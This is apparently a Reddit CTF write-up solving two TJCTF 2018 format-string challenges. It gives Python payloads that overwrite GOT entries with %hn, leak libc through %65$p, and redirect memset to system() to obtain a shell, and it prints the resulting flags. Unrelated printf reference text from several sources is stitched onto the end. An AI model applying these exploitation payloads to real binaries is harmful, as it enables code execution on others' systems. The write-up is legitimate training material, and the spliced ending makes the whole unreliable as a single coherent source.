https://preview.redd.it/s3z41w6k4uf11.png?width=380&format=png&auto=webp&s=df5851f8c46c152453bccda96d78524a5f4e4734
In the first square we have the values dumped by printf, and in the second one the actual buffer. The distance from the first printed argument to the buffer is 35 arguments. So, when we want to overwrite a few addresses using the %n format specifier, we put those addresses at the beginning of our buffer and use the %N$n syntax to access them. Let's proceed further.
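As a standalone refresher on the write primitive (plain C, independent of the challenge binary):

#include <stdio.h>

int main(void)
{
    /* %n stores the number of characters printed so far into the
     * pointed-to int; a width pad controls that number */
    int count = 0;
    printf("%100x%n\n", 0xdead, &count);
    printf("count = %d\n", count);           /* 100 */

    /* %hn writes only 2 bytes, which is why the exploit splits the
     * 4-byte value 0x08048713 into two short writes (GOT and GOT+2) */
    unsigned int value = 0;
    printf("%66x%hn\n", 0, (short *)&value); /* demo-only pointer cast */
    printf("value = 0x%x\n", value);         /* 0x42 on little-endian */
    return 0;
}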
Using Python, I generated the payload in a tidy manner:
arg_off = 35
puts_GOT = 0x0804A028
get_secret_ADDR = 0x08048713
write1 = 0x0804 - 8
write2 = 0x8713 - write1 - 8
payload = p32(puts_GOT + 2) + p32(puts_GOT) + "%{}x%{}$hn%{}x%{}$hn".format(write1, arg_off, write2, arg_off + 1)
First we write the two bytes with the smaller value, then the rest. After running it we get: tjctf{n1c3_j0b_y0u_r34lly_GOT_m3_600d}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/secure.py

Super Secure Secrets

Running the application
We have almost the same challenge, but with improved security, so let’s do some standard checks.
Checks
Now there is no get_secret() function and no buffer overflow, but we still have the same format string vulnerability in the view-message functionality. We need to follow the classic scenario: leak the libc base, then redirect a call into system().
Leaking the libc means dumping the stack before the printf and checking whether any libc address can be reached with our %N$p trick. As we are dealing with a 64-bit binary, the first 5 variadic arguments are passed in registers, so stack arguments start at 6. Let's use %6$p %7$p %8$p to dump a few values:
0x7fffffffd390 0x7fffffffd3b0 0x100000000 
Leaked arguments
Here we have the values we printed. Looking ahead we see this:
Libc address on the stack
Dividing the 0x1d8 offset by the pointer size on a 64-bit arch (8 bytes) gives 59; since stack arguments start at 6, the pointer sits at position 65. So at %65$p we have the return address into __libc_start_main, from which we can compute the base address of libc. Now we have two problems ahead: identifying the exact libc version, and keeping the program alive after our exploit runs.
Let's solve them one by one. We have two options for getting the libc version. The first is to leak argument 65 on the remote server, take the address's signature (its last 3 hex digits) and use https://libc.blukat.me/ or https://github.com/niklasb/libc-database to find the version. In this case the leaked address is 0x7fdf0a8a7b97 (it changes on every run; only the last digits stay the same, this is just an example), so its signature is b97. The second option is to use an already-solved pwn challenge on the same server to leak the libc version; it is not very fair play, but remember this trick, as it is very useful in CTFs with esoteric libc versions.
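The "signature" works because ASLR slides libc by whole pages, so the low 12 bits of any libc address are invariant across runs. A one-line check, using the example leak above:

#include <stdio.h>

int main(void)
{
    unsigned long leaked = 0x7fdf0a8a7b97UL;      /* example leak */
    printf("signature: %03lx\n", leaked & 0xfff); /* prints b97 */
    return 0;
}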
Both solutions lead to the same answer: libc6_2.27-3ubuntu1_amd64
Searching for libc
The offset of that symbol is 0x21b97, so we can now compute the base address whenever we want, but we still need to keep the program from closing. Let's investigate the code that runs after our exploit (I used IDA to decompile):
unsigned __int64 __fastcall get_message(char *a1, const char *a2)
{
  // ... code before this is not relevant
  printf(a1, &s, a2);
  puts("====================");
  for ( i = 0; i <= 5; ++i )
    v4[i] = byte_401238[rand() % 62];
  v5 = 0;
  puts("As a free trial user, please complete the following captcha for our monitoring purposes.");
  printf("Captcha: %s\n", v4);
  fgets(&s2, 7, stdin);
  if ( !strcmp(v4, &s2) )
  {
    puts("Thank you for your cooperation...");
  }
  else
  {
    memset(a1, 0, 0x80uLL);
    puts("Incorrect captcha, your message was removed from our database.");
  }
  return __readfsqword(0x28u) ^ v8;
}
After this function returns, the program closes. The simplest solution is to overwrite the GOT entry of a function that is called before the exit, and return to the beginning of the program. As memset() is not used anywhere else in the program, let's rewrite its GOT entry with 0x400DA0 (the address where the menu is printed and the interaction starts).
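Conceptually, the GOT is just a table of function pointers, so the overwrite amounts to reassigning one pointer. A toy model in plain C (menu() and the slot variable are stand-ins of mine, not the binary's symbols):

#include <stdio.h>
#include <string.h>

typedef void (*fn_t)(void);

/* stand-in for the routine at 0x400DA0 that prints the menu */
static void menu(void) { puts("1) password  2) message  3) view"); }

int main(void)
{
    fn_t got_slot = (fn_t)memset;  /* stand-in for memset's GOT entry */
    got_slot = (fn_t)menu;         /* what the format-string write accomplishes */
    got_slot();                    /* a "call to memset" now shows the menu */
    return 0;
}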
Crafting the payload is a little tricky: we are on 64-bit now, and addresses contain a lot of zero bytes, so we can't put them at the beginning of our message because they would terminate the printf. We could add them at the end, but in my case I chose to store them in the password buffer and use them from there.
After leaking the right offsets, we can craft the following vector, which leaks libc and overwrites memset@GOT.
# addresses
memset_GOT = 0x602050
secure_service_ADDR = 0x400DA0

# payload that leaks libc and rewrites memset() GOT to secure_service()
# write zeros at the first 4 bytes and the address in the last 4
# also, we will store the addresses where we write in the password buffer
off = 22       # offset of password buffer
leak_off = 65  # offset of __libc_start_main_ret on the stack
payload = "%{}$n%{}${}p%{}$n".format(off + 1, leak_off, secure_service_ADDR, off)
...
leaked_libc = stack_leak_address - 0x21b97  # calculate the base
The next step is to get a shell. We see that memset() is called with our message as its first argument, so if we replace it with system() and put "sh || " at the beginning of our message, we get a shell, and the errors from the rest of the string are ignored. So, let's write the payload:
# payload that rewrites memset() GOT to system()
write1 = (0xffff00000000 & system_ADDR) / 0x100000000
write2 = (0x0000ffff0000 & system_ADDR) / 0x10000
write3 = (0x00000000ffff & system_ADDR)

# sort the writes in ascending order
writes = [
    (write1, p64(memset_GOT + 4)),
    (write2, p64(memset_GOT + 2)),
    (write3, p64(memset_GOT + 0)),
]
writes.sort(key=lambda tup: tup[0])
print (writes)

addresses = ''.join(x[1] for x in writes)
write3 = writes[0][0]
write2 = writes[1][0]
write1 = writes[2][0]

code = "sh || "
payload = code + "%{}x%{}$hn%{}x%{}$hn%{}x%{}$hn".format(
    write3 - len(code), off,
    write2 - write3, off + 1,
    write1 - write2, off + 2)
Running the full script will have great results:
Running the exploit
Flag: tjctf{4r3_f0rm47_57r1n65_63771n6_0ld_y37?}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/super_secure.py
And here we are, at the end of the journey. We pwned them all! TJCTF was a great experience with pretty interesting, beginner-oriented tasks, so I recommend it to any newcomer; the organizers did a really great job of assuring a high-quality CTF.
Don't forget to subscribe and follow my GitHub for more wargame solutions and guides. Thanks for reading!
submitted by l1ttl3wh0 to securityCTF [link] [comments]

Hexadecimal is often just as good (or even better), as it maps every 4 bits into one hex digit, giving you both a compact and expressive representation of the binary data. – Kerrek SB, Jun 16 '11

Is there a printf converter to print in binary format? The printf() family is only able to print in base 8, 10, and 16 using the standard specifiers directly, so the usual advice is to create a function that converts the number to a string, tailored to the code's particular needs.

If format includes format specifiers (subsequences beginning with %), the additional arguments following format are formatted and inserted into the resulting string, replacing their respective specifiers. The format parameter is a C string that contains the text to be written to stdout; it can optionally contain embedded format specifiers that are replaced by the values given in the subsequent additional arguments.

For the integer specifiers (d, i, o, u, x, X), precision specifies the minimum number of digits to be written. If the value to be written is shorter than this number, the result is padded with leading zeros; the value is not truncated even if the result is longer. A precision of 0 means that no character is written for the value 0. For the e, E and f specifiers, precision is the number of digits to be printed after the decimal point.

A handy shape for the formatting text is %w.pf: w sets the minimum field width of the entire number, including the decimal point, and p sets the precision. For example, printf("%9.2f", 12.45); outputs four spaces and then 12.45; those four spaces plus the five characters of 12.45 make up the field width of 9.

The shell's printf works the same way, with %s, %b, %d, %x and %f being the most commonly used specifiers, each replaced by a corresponding argument:

$ printf "%s\n" "hello printf" "in" "bash script"
hello printf
in
bash script

A nice property of the printf formatting syntax is that the format specifiers are very similar, if not identical, across languages, including C, C++, Java, Perl, PHP, Ruby and Scala.
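Since printf has no binary conversion, a tiny helper fills the gap. This is a minimal sketch of my own, not code from any of the quoted sources:

#include <stdio.h>
#include <limits.h>

/* Render an unsigned int as a binary string, most significant bit first.
 * buf must hold at least sizeof(unsigned int) * CHAR_BIT + 1 bytes. */
static char *to_binary(unsigned int value, char *buf)
{
    char *p = buf;
    for (int bit = (int)(sizeof value * CHAR_BIT) - 1; bit >= 0; bit--)
        *p++ = ((value >> bit) & 1u) ? '1' : '0';
    *p = '\0';
    return buf;
}

int main(void)
{
    char buf[sizeof(unsigned int) * CHAR_BIT + 1];
    printf("%u -> %s\n", 42u, to_binary(42u, buf));  /* ...00101010 */
    return 0;
}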
